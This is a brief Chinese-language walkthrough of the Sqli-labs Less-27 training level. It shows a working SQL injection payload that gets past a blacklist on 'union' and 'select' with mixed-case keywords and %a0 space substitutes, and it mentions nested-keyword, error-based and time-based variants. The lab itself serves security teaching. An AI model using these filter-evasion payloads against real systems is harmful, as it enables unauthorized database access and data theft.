Sqli-labs less 27

Less-27

本关主要考察将union，select和26关过滤掉的字符。此处我们依旧和26关的方式是一样的，只需要将union和select改为大小写混合就可以突破。

示例：127.0.0.1/sqllib/Less-27/?id=100'unIon%a0SelEcT%a01,database(),3||'1

TIPS：uniunionon也是可以突破限制的。亦可以利用报错注入和延时注入的语法进行注入。